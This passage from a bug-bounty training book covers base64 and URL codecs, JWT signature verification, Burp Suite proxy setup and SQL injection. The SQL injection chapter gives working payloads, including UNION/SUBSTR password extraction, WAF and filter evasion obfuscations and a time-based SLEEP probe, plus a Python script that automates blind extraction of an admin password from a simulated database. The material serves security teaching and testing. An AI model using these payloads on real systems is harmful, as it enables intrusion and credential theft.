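        bits <<= 6 * (4 - len(group))          # pad the group to 24 bits
        out += bits.to_bytes(3, "big")[:len(group) - 1]   # drop filler bytes
    return bytes(out)


def url_encode(text: str, space_as_plus: bool = True) -> str:
    """Percent-encode a query value: unreserved ASCII passes through, a space
    becomes '+' (or '%20'), anything else is '%' + two hex digits per UTF-8 byte.
    """
    out = []
    for ch in text:
        if ch.isascii() and (ch.isalnum() or ch in "-_.~"):
            out.append(ch)
        elif ch == " ":
            out.append("+" if space_as_plus else "%20")
        else:
            out.extend("%%%02X" % b for b in ch.encode("utf-8"))
    return "".join(out)


def url_decode(text: str) -> str:
    """Reverse url_encode; '+' is read as a space, as in query strings."""
    buf = bytearray()
    i = 0
    while i < len(text):
        if text[i] == "%" and i + 2 < len(text):
            buf.append(int(text[i + 1:i + 3], 16))   # ValueError if not hex
            i += 3
        elif text[i] == "+":
            buf.append(0x20)
            i += 1
        else:
            buf += text[i].encode("utf-8")
            i += 1
    return buf.decode("utf-8")


def cross_check(sample: bytes, query: str) -> bool:
    """True when every hand-rolled codec agrees with the standard library."""
    return (b64_encode(sample) == base64.b64encode(sample).decode()
            and b64_encode(sample, urlsafe=True)
            == base64.urlsafe_b64encode(sample).decode().rstrip("=")
            and b64_decode(b64_encode(sample, urlsafe=True)) == sample
            and url_encode(query) == urllib.parse.quote_plus(query)
            and url_decode(url_encode(query)) == query)
```

The bytes 0xFB 0xFF are a handy constructed input: they produce the "+" and "/" symbols, so they show exactly where base64 and base64url differ.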
JSON Web Tokens

An open industry standard called JSON Web Token (JWT) is used to transfer data between two entities, typically a client (such as the front end of your application) and a server (the back end of your app).

They include JSON objects with the shared data inside them. In order to prevent the client or a hostile third party from changing the JSON content, sometimes referred to as JWT claims, each JWT is also signed using cryptography (hashing).

For example, Facebook produces a JWT with the following claims in its JSON payload when connecting to them.

{
  "iss": "https://login.facebook.com",
  "azp": "34234123.apps.facebook.com"
}

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

JSON web tokens provide a secure means of user identification when used correctly. Upon receipt of the token, the server can confirm that it has not been tampered with by checking the correctness of the signature. The information in the payload portion can be used by the server to determine who the user is. In addition, the user cannot change the payload and sign the token himself, because he does not possess the secret key necessary to do so.

However, there are ways an attacker can bypass the security process and forge arbitrary tokens if it is done incorrectly.

Learn to program

Now that you have a solid foundation, you should be able to understand most of the vulnerabilities we are going to discuss. I advise you to learn programming before setting up your hacking tools. Programming knowledge is beneficial since finding flaws requires a lot of repetitive work. By learning a language like Python or shell scripting, you can automate these procedures and save a ton of time.

Most websites are built with JavaScript, so you should learn to read it as well. Examining a website's JavaScript can give you quick access to its functionality and help you identify bugs.

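The verification a server should perform on a JWT, covering the signature check from the JSON Web Tokens section and the expiry and tamper checks of the Validation step in token-based authentication, as an added example in Python (not the book's code). It decodes the token printed above without trusting it; the signing key and the tokens it mints are constructed for the demonstration.

```python
"""Verifying an HS256 JSON Web Token on the server side.

Added example, not from the book. The header.payload.signature layout is
the one the JSON Web Tokens section describes; the secret key and the
tokens minted below are constructed for the demonstration.
"""
import base64
import hashlib
import hmac
import json
import time

# The token quoted in the JSON Web Tokens section. Header and payload are
# plain base64url JSON that anyone can read; only the signature needs the key.
BOOK_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
              "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c")

# Constructed demo key; a real server keeps this where clients cannot reach it.
DEMO_SECRET = b"demo-secret-not-for-production"


def b64url_decode(part: str) -> bytes:
    """base64url as JWT uses it: '-' '_' alphabet with the padding stripped."""
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str):
    """Read header and claims WITHOUT trusting them (inspection only)."""
    header_b64, payload_b64, _ = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint base64url(header).base64url(claims).base64url(HMAC-SHA256 of both)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(claims, separators=(",", ":")).encode()))
    mac = hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Return the claims only if the token is well formed, carries a valid HS256
    signature under `secret` and has not expired; raise ValueError otherwise.

    The algorithm is fixed by the server, never read from the header, so a
    token whose header says "none" or anything else is rejected before its
    signature is even examined.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("token must be header.payload.signature")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg %r" % header.get("alg"))
    expected = hmac.new(secret, (header_b64 + "." + payload_b64).encode("ascii"),
                        hashlib.sha256).digest()
    # compare_digest is constant-time, so the comparison leaks nothing via timing.
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature: payload altered or signed with another key")
    claims = json.loads(b64url_decode(payload_b64))
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise ValueError("token expired")
    return claims


def rewrite_payload(token: str, new_claims: dict) -> str:
    """Keep header and signature but swap the claims: the tampering the
    verifier must catch, because the old signature no longer matches."""
    header_b64, _, sig_b64 = token.split(".")
    return header_b64 + "." + b64url_encode(json.dumps(new_claims).encode()) + "." + sig_b64


def alg_none_token(claims: dict) -> str:
    """A token whose header asks for no signature at all; must be rejected."""
    header = b64url_encode(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return header + "." + b64url_encode(json.dumps(claims).encode()) + "."


def is_rejected(token: str, secret: bytes, now=None) -> bool:
    """True when verify_hs256 refuses the token."""
    try:
        verify_hs256(token, secret, now)
    except ValueError:
        return True
    return False
```

Passing a fixed `now` keeps the expiry check deterministic; in production you would simply omit it and let `time.time()` be used.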
1.2 - SETUP #1.2

Setting up a good environment before you start your hacking career is one of the most important points; you will save a lot of time and headaches. I will guide you through setting up your hacking environment step by step in this chapter.

Selection of an operating system

To use Burp Suite, a web proxy that allows you to view and modify HTTP requests and responses transmitted between your browser and web servers, you must configure your browser to work with it. You'll discover how to use Burp's functionality to send repetitive and automated requests, decode encoded content, and compare requests. I'll also discuss how to write effective bug bounty notes.

I apologize in advance for upsetting some people, but please read on so I can explain what I mean. Using Microsoft Windows or macOS as your "daily driver" is perfectly acceptable. Numerous accomplished bug hunters use these proprietary operating systems, as evidenced by their publicly available lectures and YouTube videos. But many of the same people also use cloud-based Linux virtual private servers (VPS) for reconnaissance and web request proxies.

Since many open source hacking tools are designed for Unix-based systems, such as Kali Linux or macOS, I advise you to use one of them. Kali Linux is a Linux variant aimed at hacking and digital forensics. It has a ton of useful bug bounty tools, including fuzzers like Wfuzz, recon tools like DirBuster and Gobuster, and Burp Suite. Kali Linux is available for download at https://www.kali.org/downloads/.

If you are not able to use these alternatives, you are welcome to hack from other operating systems. Just be aware that you may need to learn to use tools other than those listed in this book.

Installing a browser and proxy: The basics

Bug bounty hunters use Burp Suite, a powerful tool, extensively to discover vulnerabilities in web applications. It is a group of technologies that combine to make the process of testing web applications for security flaws more efficient and automated. I will go over several tricks and strategies for using Burp Suite for bug bounty hunting in this book. Burp Suite can be used to intercept and modify HTTP/HTTPS requests.

The browser will be used to examine the functionality of an application. Firefox is the easiest to set up with a proxy, so I suggest you use it. When hacking, you can also use two separate browsers: one to browse the target and one to research security holes online. This way, you can quickly separate traffic related to your intended application for further analysis.

Software that acts as an intermediary between a client and a server is known as a proxy; in this case, the proxy sits between your browser and the web servers it communicates with. It does this by intercepting both your requests and the server's responses before passing them on. For example:

Browser <--------------> Proxy <--------------> Server

It is imperative to use a proxy for bug bounty hunting. As I will describe later in this chapter, proxies allow you to view and modify the requests that are sent to the server and the responses that arrive at your browser. In the absence of a proxy, communication between the browser and the server would happen automatically and out of sight; all that would be visible to you would be the finished web page. With a proxy, on the other hand, all messages are intercepted before they reach their intended destination.

Because of this, you can perform recon using proxies by examining and analyzing traffic entering and leaving the server. They also allow you to investigate intriguing requests to find any security holes and manipulate requests to exploit these weaknesses.

Let's take an example where you browse your email inbox and use a proxy to intercept the request that returns your email. This is a GET request directed to a URL containing your user ID. Note also that the request contains a cookie containing your user ID:

To determine if you can access another user's information in this situation, try changing the USER_ID in the URL to that of the other user. The server will either accept the request and give you access to the object, or it may send back a 403 error, indicating that you cannot read that type of information.

Launching the embedded browser

Both editions of Burp Suite provide a built-in browser. You can skip the next two steps if you decide to try this built-in browser. After launching Burp, select the Open Browser option on the Proxy tab to use Burp Suite's built-in browser. Without any further configuration, Burp will automatically route all traffic from this built-in browser.

Configure Firefox

Burp's built-in browser provides an easy way to start your bug search with little configuration. On the other hand, Burp can be configured to work with your own browser if, like me, you prefer to use a familiar one. Let's configure Burp to work with Firefox.

Installing a proxy and downloading your browser are the first steps. Downloads for Burp Suite and the Firefox browser are available at https://portswigger.net/burp/ and https://www.mozilla.org/firefox/new/, respectively.

Bug bounty hunters use one of the two editions of Burp Suite: Professional or Community. Burp Suite Community is available for free, whereas Burp Suite Professional requires a license. A vulnerability scanner and other handy features, such as the ability to save and continue a work session at a later time, are included in Burp Suite Pro. In addition, it provides Burp Intruder in its entirety, whereas the community edition only has a condensed version. In this book I'm going to talk about how to use the community edition to find bugs.

Now you need to configure your browser to use Burp's proxy to redirect traffic. You can configure Firefox to work with Burp Suite by following the instructions in this section. Refer to the official documentation of the browser/proxy combination you are using for other tutorials.

Open Firefox. Then, select Preferences > General > Network Settings to display the Connection Settings page. The Preferences tab is available through the menu in the upper right corner of Firefox.

The Connection Settings page should look similar to the one shown in the figure.

The Preferences option is located in the upper right corner of Firefox.

For each protocol type, choose Manual proxy settings and enter 127.0.0.1 as the IP address and 8080 as the port. This will instruct Firefox to route all its traffic through the service on port 8080 of the machine. 127.0.0.1 is the IP address of localhost; it refers to the system you are currently using, allowing you to reach the network services that are available on it.

Burp listens by default on port 8080, so this setting instructs Firefox to send all traffic through Burp. To complete the setting, click OK. All Firefox traffic will now be redirected through Burp.

This process can be automated by means of a Firefox extension called FoxyProxy. You can find it at https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-basic. It is very simple: you configure the IP as you did in Firefox, but instead of doing it in the browser, as indicated in the previous steps, you do it directly in the extension. In addition, it allows you to enable or disable the proxy with a click. Maybe now you think it's an unimportant extension; I am sure that in the future you will thank me for recommending it.

Getting things ready for Burp

Open Burp Suite after downloading it, select Next, and then click Start Burp. There should be a window like this.

Now let's configure Burp to work with HTTPS traffic. By encrypting your traffic and limiting access to it to only the two parties involved in a communication, your browser and the server, HTTPS protects the privacy of your data. This means that HTTPS traffic entering and leaving your browser cannot be intercepted by your Burp proxy. Installing the certificate authority (CA) certificate for your Burp proxy will tell Firefox that it is a trusted entity, which will solve this problem.

Now that Firefox has the Burp certificate installed, it can work with HTTPS traffic. Open your browser and navigate to http://burp/ with Burp open and running and your proxy settings set to 127.0.0.1:8080.

Next, select Preferences > Privacy and Security > Certificates in Firefox.

Click View Certificates and then Authorities. After selecting the file you just saved with Import, click Open. To rely on the certificate to identify websites, follow the instructions in the dialog. Select the Trust this CA to identify websites option in the Firefox dialog.

Restart Firefox. You should now be ready to intercept traffic over HTTP and HTTPS.

Let's perform a test to make sure Burp is working properly. Navigate to the Proxy tab in Burp and select Intercept is off to enable traffic interception. At this point, the button should say Intercept is on. This indicates that you are intercepting Firefox or embedded browser traffic.

Open Firefox after that, and navigate to https://www.google.com. You should notice that individual requests start appearing in the main Burp proxy window.

The Forward button in Burp Proxy forwards the active request to the specified server. When the request with the hostname www.google.com appears, click Forward. Burp is successfully intercepting Firefox traffic if it sees this request. This should get you started.

------------------------------------
GET / HTTP/1.1
Host: www.google.com
------------------------------------

To transmit the request to the Google server, click Forward. The Google home page should open in a Firefox window for you.

In the event that the requests are not displayed in the Burp window, it is possible that the Burp CA certificate has not been installed correctly. To reinstall the certificate, follow the instructions in this chapter. Also, confirm that the proxy settings in the Firefox Connection Settings are set correctly to 127.0.0.1:8080.

Using Burp

The web proxy is not the only useful feature in Burp Suite. A repeater to modify specific requests, a decoder to decode encoded content, an intruder to automate attacks, and a comparison tool to compare requests and responses are also included in Burp Suite. We will discuss these here because they are the most useful features of Burp for bug bounty.

Proxy

Let's see how to inspect, edit and forward requests to other Burp modules using the Burp proxy. Explore Burp's capabilities by opening it, selecting the Proxy tab and getting started! Make sure the Intercept button is red to start intercepting traffic: that means the interceptor is active.

By right-clicking on the request or response, you can send it to several Burp modules.

When using the built-in browser or Firefox with Burp to access a website, an HTTP/HTTPS request should appear in the main window. Every request your browser makes while interception is enabled will pass through Burp and be held there until you click Forward in the proxy window. This is your opportunity to change the request before sending it to the server or transmitting it to other Burp modules.

To search for strings in the requests or responses, you can also use the search box at the bottom of the window.

Let's experiment using Burp Proxy to intercept and manipulate traffic!

Enable traffic interception by going to Burp Proxy. Next, launch the built-in Burp browser or Firefox and go to https://www.google.com. Click Forward until you see the request with the hostname www.google.com, just as you did in the previous section. This type of request should be visible to you:

The Repeater

Most likely the tool you will use the most is the Repeater. It allows you to change requests and thoroughly review server responses. It can also be used to save intriguing requests for later review.

While you can change requests with both the Repeater and the Intruder, their functions are completely different. The Intruder automates attacks by automatically sending requests that have been mechanically modified. The Repeater is designed for manual, in-depth changes to a single request.

By right-clicking on the request and choosing "Send to Repeater", you can send requests to the Repeater; the requests are displayed on the left side of the Repeater screen. Here, you can edit a request and click the Send button at the top to send the request.

The Decoder

The data found in requests and responses can be easily encoded and decoded using the Burp decoder (Figure 4-15). I use it primarily to encode, decode, and manipulate application data before sending it to applications.

To send data to the decoder, select Send to Decoder from the context menu when right-clicking on a highlighted section of text in any request or response. To choose the algorithm to be used to encode or decode the message, use the drop-down options on the right. Use Smart decode to determine the encoding of the message if you are unsure. Burp will attempt to recognize the encoding and adjust the decoding of the message accordingly.

The Comparer

One method of comparing requests or responses is with the Comparer. It draws attention to variations between two blocks of text. For example, you can use it to investigate how a change in parameters affects the response you receive from the server. To send data to the Comparer, select Send to Comparer from the context menu when right-clicking on a highlighted section of text in any request or response.

The comparison tool will indicate the variations between two text blocks.

Save Burp requests

In Burp, you can also save requests and responses. To save these results to your notes folder for that target, simply right-click on a request: the URL of the request can be copied using the Copy URL option. The entire request, including the method, URL, headers and body, is copied as a curl command when using Copy as curl command. The request is saved as a separate file when using Copy to file.

Concluding notes

A brief note of caution before we start looking for vulnerabilities in the next chapter: being well organized is essential for successful bug bounties. The amount of information acquired from targets can grow and become difficult to manage when working on targets with large scopes or hacking multiple targets at once.

You will not always be able to identify bugs right away. Rather, you will notice a lot of oddities and misconfigurations that are not exploitable at the moment, but which you can later combine with other findings to launch an attack. To ensure that you can promptly use all the new features, misconfigurations, small flaws and suspicious endpoints you observe, you will need to make detailed notes about them.

Notes also help in planning attacks. You have the ability to monitor the progress of your hacking, as well as the features you have tested and those you still need to verify. By doing so, you can avoid wasting time repeatedly testing the same features.

Making notes on the vulnerabilities you discover is another useful purpose for them. Keep track of the specifics of any vulnerability, including its theoretical underpinnings, possible consequences, exploitation methods, and proof-of-concept code. This will hone your technical skills over time and create a technical bank that you can refer to when needed.

One of my main strategies, now and since I started, is not to focus on looking for critical vulnerabilities. There are many hackers who always aim to find the highest-severity bug, but that bug does not always come, and it is much more difficult than it seems. That's why my strategy is quantity over quality; I know the phrase is backwards, but it works for me, and you bought my mentorship so that I give you all my knowledge and not false ideas.

My daily session is in the afternoon; I go searching for a couple of hours with the goal of finding 1-3 bugs per day. Imagine that for each bug you get paid only $500 or $1,000; it's a fortune to earn that kind of money per day, and it seems to me a serious thing to follow the theory that finding low/medium impact bugs can make you a real millionaire.

36 MILLIONAIRE RECORDS
CHAPTER TWO

WEB VULNERABILITIES

2.1 - SQL INJECTION
SQL Injection (SQLi): What is it?

SQL injection (SQLi) is a web security flaw that allows an attacker to manipulate the queries that an application sends to its database. As a result, an attacker may be able to see data that they would not normally be able to access. This could include data belonging to other users, or any other data the application has access to. In many cases an attacker can also alter or delete this data, changing the application's behavior or content in a persistent way.

A SQL injection attack can sometimes be escalated by an attacker to compromise the underlying server or other back-end infrastructure. It may also allow them to carry out denial-of-service attacks.

What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as:

• Passwords.
• Credit card details.
• Users' personal information.

SQL injection attacks have been used in many high-profile data breaches over the years. They have caused reputational damage and regulatory fines. In some cases, an attacker can gain a persistent backdoor into an organization's systems, leading to a long-term compromise that can go undetected for an extended period.

How to find vulnerabilities related to SQL injection

By performing a methodical set of tests against each application entry point, you can identify SQL injection manually. Normally, to accomplish this, you would submit:

• The single quote character ' and look for errors or other anomalies.
• Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and some that evaluates to a different value, and look for systematic differences in the application's responses.
• Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's responses.
• Payloads designed to trigger a time delay when executed within a SQL query, and look for differences in response times.
• OAST payloads designed to trigger an out-of-band network interaction when executed within a SQL query, and look for the resulting interactions.

SQL injection occurring in several parts of the query

Most SQL injection problems occur in the WHERE clause of a SELECT query. Most experienced testers are familiar with this type of SQL injection.

SQL injection vulnerabilities, however, can appear anywhere in the query and in a variety of query types. Other typical places where SQL injection occurs include:

• In UPDATE statements, within the updated values or the WHERE clause.
• In INSERT statements, within the inserted values.
• In SELECT statements, within the table or column name.
• In SELECT statements, within the ORDER BY clause.

SQL injection examples

There are numerous SQL injection techniques, attacks and vulnerabilities, and they arise in a variety of contexts. Typical instances of SQL injection include:

• Retrieving hidden data, where you modify a SQL query to return additional results.
• Subverting application logic, where you change a query to interfere with the application's logic.
• UNION attacks, which allow you to retrieve data from several database tables.
• Blind SQL injection, where the results of a query you control are not returned in the application's responses.

Retrieving hidden data

Consider a shopping application that displays products in different categories. When the user clicks on the Gifts category, their browser requests the following URL: https://insecure-website.com/products?category=Gifts

This causes the application to make a SQL query to retrieve details of the relevant products from the database:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

This SQL query asks the database to return:

• All columns (*) from the products table, where the category is Gifts and released is 1.
• Unreleased products are hidden by the restriction released = 1. For unreleased products, we can presume that released = 0.

The application does not implement any defense against SQL injection attacks. This means that an attacker can construct the following attack, for example:

https://insecure-website.com/products?category=Gifts'--

This results in the SQL query:

SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1

• Crucially, note that -- is a comment indicator in SQL. This means that the rest of the query is interpreted as a comment and effectively removed. In this example, this means that the query no longer includes AND released = 1.
• As a result, all products are displayed, including those that have not yet been released. You can use a similar attack to make the application display all products in any category, including categories you do not know about:

https://insecure-website.com/products?category=Gifts'+OR+1=1--

Take care when injecting OR 1=1: if the same input also reaches an UPDATE or DELETE statement, the condition makes that statement apply to every row.

Blind SQL injection vulnerabilities

Blind vulnerabilities represent a large share of SQL injection cases. This means that the application returns neither the output of the SQL query nor the details of database errors in its responses. Blind vulnerabilities can still be used to obtain unauthorized data, but this generally requires more advanced and laborious techniques.

Depending on the characteristics of the vulnerability and the database in question, blind SQL injection vulnerabilities can be exploited using the following methods:

• By changing the query logic, you can make the application's response noticeably different depending on whether a single condition is true or false. This could involve injecting a new condition into some Boolean logic, or conditionally triggering an error such as a divide-by-zero.
• It is possible to conditionally trigger a time delay in query processing. This allows you to infer whether the condition is true or false from the time the application takes to respond.
• Using OAST techniques, you can trigger an out-of-band network interaction. This method is quite effective and can be used in circumstances where the other methods cannot. Data can often be exfiltrated directly over the out-of-band channel, for example by placing it in a DNS lookup for a domain you control.

Searching for blind SQL injections

Blind SQL injections, also known as inferential SQL injections, are somewhat harder to find and exploit. They occur when an application produces no useful SQL output or error messages, so attackers cannot retrieve information directly from the database.

In this case, attackers deduce information by sending SQL injection payloads to the server and observing its subsequent behavior. There are two varieties of blind SQL injection: time-based and Boolean-based.

In Boolean-based SQL injection, attackers insert test conditions into a SQL query that evaluate to true or false, and deduce the structure of the database from the differing responses. Using those answers, attackers can gradually deduce the contents of the database.

Let's take an example where example.com tracks its premium

web vulnerabilities 41
subscribers on the platform using a separate table.

In addition to having access to enhanced features, premium users' home pages show a banner that says "Welcome, premium member!" The website establishes who is premium by reading a cookie containing the user's ID and comparing it against the list of registered premium members. This is what a GET request with such a cookie may look like:

--------------
GET /
Host: example.com
Cookie: vulnerable_id=1
--------------

The application uses this request to generate the following SQL query:

SELECT * FROM PremiumUsers WHERE Id='1';

If this query returns results, the user is a premium member and the "Welcome, premium member!" banner appears. If it returns nothing, the banner does not appear. Suppose you have a non-premium account. What would happen if you submitted this user ID instead?

--------------
2' UNION SELECT Id FROM Users
WHERE Username = 'admin'
and SUBSTR(Password, 1, 1) ='a';--
--------------

The query would then be as follows:

--------------
SELECT * FROM PremiumUsers WHERE Id='2'
UNION SELECT Id FROM Users
WHERE Username = 'admin'
and SUBSTR(Password, 1, 1) = 'a';--'
--------------

The SUBSTR(STRING, POSITION, LENGTH) function extracts a substring of the given LENGTH starting at the given POSITION within a string. Consequently, SUBSTR(Password, 1, 1) returns the first character of each user's password. Because user 2 is not a premium member, the first SELECT returns nothing, so whether the query returns any rows is decided by the second SELECT, which only returns a row if the administrator account's password begins with a. So if you send this user ID in the cookie, the web application will display the premium banner if and only if the admin password starts with an a. This means you can brute-force the administrator's password: until it works, you retry the query with the letters b, c, and so on, then move on to the second character. Note that a UNION only works when both SELECTs return the same number of columns (with compatible types), so in practice you first have to determine how many columns the original query returns.

This method can be used to retrieve important information from the database, including the database version, table names, column names and credentials. I introduce more details about this on page 201 of "Escalating the Attack".

Similar techniques are used in time-based SQL injections, where the attacker relies on differences in response time caused by different SQL injection payloads rather than on a visual cue on the website. What would happen, for example, if the injection point in the example above did not produce any visual cue about the query result? Let's assume that premium members do not receive a distinct banner and that their user interface is the same as everyone else's. So how can this SQL injection be leveraged? In that case the attacker injects a condition that delays the response only when the guess is correct (see the time-based example in the Bypass protection section) and times the response instead of looking at the page.

Automating SQL injection

Manual SQL injection verification does not scale. To automate each step of the approach described in this chapter, from SQL injection detection to exploitation, I recommend using tools. For example, sqlmap (http://sqlmap.org/), a Python application, simplifies the process of finding and exploiting SQL injection vulnerabilities. Although this book cannot cover a complete sqlmap tutorial, its documentation is available at https://github.com/sqlmapproject/sqlmap/wiki/.

Make sure you understand each of sqlmap's techniques before automating your attacks, so that you can maximize your efficiency. This chapter covers most of those techniques. sqlmap can be used on its own or integrated with the testing proxy you use; for example, by installing the SQLiPy Burp extension you can run sqlmap from inside Burp.

How to locate your first SQL injection

Investigate SQL injection vulnerabilities in practice applications or in bug bounty programs. Identifying and exploiting these vulnerabilities is interesting work. If you wish, you can first try attacking a deliberately vulnerable application, such as Damn Vulnerable Web Application (available at http://www.dvwa.co.uk), since SQL injections can sometimes be difficult to exploit. Then, to start identifying real SQL injection vulnerabilities in the field, follow this roadmap:

1. Map every endpoint in the application that receives user input.
2. Insert test payloads into these locations to find out whether they are susceptible to SQL injection. If an endpoint is not susceptible to classic SQL injection, try inferential (blind) approaches instead.
3. Once you have verified that the endpoint is susceptible to SQL injection, use several SQL injection queries to expose the database's data.
4. Take it further. Determine what information can be obtained from the endpoint and whether it is possible to bypass authentication. Be careful not to perform any operations that could compromise the integrity of the target database, such as deleting user data or changing the database structure.
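The roadmap above, run end to end against a simulated target, as an added example (my code, not the book's): a small SQLite-backed check stands in for the example.com premium-member lookup from the previous pages, the Boolean probes of step 2 confirm the injection, and step 3 extracts the admin password with the UNION/SUBSTR trick, one character per request. Table and column names follow the book's example; the rows, the password "s3cret", the probe payloads and the function names are assumptions made for the demonstration.

```python
import sqlite3
import string

# Constructed in-memory database standing in for example.com's backend.
# Table and column names follow the book's example; the rows (and the
# admin password "s3cret") are made up for this demonstration.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE PremiumUsers (Id TEXT);
    CREATE TABLE Users (Id TEXT, Username TEXT, Password TEXT);
    INSERT INTO PremiumUsers VALUES ('1');
    INSERT INTO Users VALUES ('1', 'admin', 's3cret'), ('2', 'bob', 'hunter2');
""")


def is_premium_vulnerable(cookie_id: str) -> bool:
    """The vulnerable check: the cookie value is concatenated into the query.
    Errors are swallowed, so the only signal an attacker gets is whether the
    premium banner would be shown (True) or not (False): a blind oracle."""
    query = f"SELECT Id FROM PremiumUsers WHERE Id='{cookie_id}'"
    try:
        return _db.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False


def is_premium_safe(cookie_id: str) -> bool:
    """The same check with a parameterized query: the cookie value is bound
    as data and never parsed as SQL."""
    row = _db.execute("SELECT Id FROM PremiumUsers WHERE Id=?", (cookie_id,)).fetchone()
    return row is not None


def detect_boolean_sqli(oracle) -> bool:
    """Roadmap step 2: send a condition that is always true and one that is
    always false and check whether the application behaves differently.
    The quotes are arranged so the closing quote the application appends
    still closes a string."""
    baseline = oracle("2")                # WHERE Id='2'             -> no banner
    true_case = oracle("2' OR '1'='1")    # WHERE Id='2' OR '1'='1'  -> banner if injectable
    false_case = oracle("2' AND '1'='2")  # WHERE Id='2' AND '1'='2' -> no banner
    return (not baseline) and true_case and (not false_case)


def extract_admin_password(oracle, alphabet=string.ascii_lowercase + string.digits,
                           max_len=32) -> str:
    """Roadmap step 3: Boolean-based blind extraction. Each probe appends a
    UNION that returns a row only when the guessed character at the given
    position is right. UNION requires both SELECTs to return the same
    number of columns (one here). The trailing -- comments out the closing
    quote the application appends."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = (
                "2' UNION SELECT Id FROM Users WHERE Username='admin' "
                f"AND SUBSTR(Password,{pos},1)='{ch}'--"
            )
            if oracle(payload):
                recovered += ch
                break
        else:
            break  # no character matched: we ran off the end of the password
    return recovered


if __name__ == "__main__":
    for name, oracle in (("string-built", is_premium_vulnerable),
                         ("parameterized", is_premium_safe)):
        print(f"{name}: injectable={detect_boolean_sqli(oracle)}, "
              f"recovered={extract_admin_password(oracle)!r}")
```

Run it directly to see both checks side by side: the string-built check leaks the whole password, the parameterized one answers False to every probe. Against a real target the oracle is an HTTP request that reports whether the banner appeared; the rest of the logic stays the same.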

Bypass protection

As SQL injection vulnerabilities have become more widely known, developers and system administrators have implemented various protective measures to mitigate the risk. Persistent attackers, however, have developed techniques to evade these protections and continue exploiting SQL injection vulnerabilities. This section explores the tactics and strategies used to circumvent SQL injection defenses.

1. Input filter evasion

Objective: To get malicious payloads through input filters designed to block them.
Techniques:
• Keyword obfuscation: Use comments, whitespace, special characters or encoding to hide keywords such as SELECT, UNION, DROP, etc.
• Use of synonyms and alternative functions: Replace keywords with synonyms or equivalent functions (e.g., || instead of CONCAT).
• Multi-stage injection: Split the payload into multiple parts that are combined on the server.
Example:
1. Original payload: ' UNION SELECT password FROM users--
2. Obfuscated payload: '/**/UnIoN/**/SeLeCt/**/password/**/FrOm/**/users--

2. WAF (Web Application Firewall) evasion

Objective: To circumvent the detection rules of a WAF so that it does not block malicious requests.
Techniques:
• Payload obfuscation: Use techniques similar to those used to bypass input filters.
• Payload fragmentation: Split the payload across multiple requests so that the WAF never sees it in its entirety.
• Use of encoding techniques: Encode the payload in different formats (URL encoding, hexadecimal, base64) to make detection more difficult.
Example:
• Original payload: ' UNION SELECT password FROM users--
• URL-encoded payload: %27%20UNION%20SELECT%20password%20FROM%20users--

3. Time-based attacks

Objective: To extract information from the database through the server's response time.
Techniques:
• Time-based blind SQL injection: Use functions such as SLEEP or BENCHMARK to delay the server's response if a specific condition is met.
• Measuring response time: Measure how long the server takes to respond to deduce whether the condition is met or not.
Example:
• ' AND IF(SUBSTRING(password,1,1)='a', SLEEP(5), 1)-- (Delays the response by 5 seconds if the first character of the password is 'a'. IF and SLEEP are MySQL syntax; other databases use different constructs, such as pg_sleep in PostgreSQL or WAITFOR DELAY in SQL Server.)

4. Second-order attacks

Objective: Exploit SQL injection vulnerabilities that only manifest at a later stage, after the malicious data has been stored in the database.
Techniques:
• Storing malicious payloads: Enter payloads into fields that are stored in the database.
• Triggering the payloads later: Retrieve the stored data in a vulnerable context so that the payload executes.

Advanced SQL injection defenses

• Prepared statements: Parameterize SQL queries so that user-supplied data is never interpreted as code.
• Stored procedures: Limit the operations a user can perform on the database.
• Whitelisting: Allow only specific, valid input values.
• Escaping: Correctly encode special characters so that they are not interpreted as code.

Escalating the attack

This section looks at how an attacker can exploit an initial SQL injection vulnerability to gain greater control over a system or database. Here are some key issues you might encounter:

Beyond data extraction: While SQL injection is often associated with the extraction of sensitive data, escalation attacks go beyond that. Attackers may attempt:

• System command execution: Using SQL injection to execute commands on the underlying operating system, which could allow them to take control of the server.
• Privilege escalation: Gaining access to user accounts with higher privileges within the database.
• Data tampering: Modifying or deleting data in the database.

Types of escalation:
• Second-order SQL injection: The attacker inserts malicious code that is executed later, when a different request is processed.
• Inference-based SQL injection: The attacker deduces information about the database structure from the server's responses to manipulated SQL queries.
• Blind SQL injection: The attacker does not see the results of their SQL queries directly, but can infer information from the application's behavior.

Escalation techniques:
• Database enumeration: Discover database names, tables and columns.
• Identification of functions and stored procedures: Find out which functions and procedures are available in the database and how they can be used.
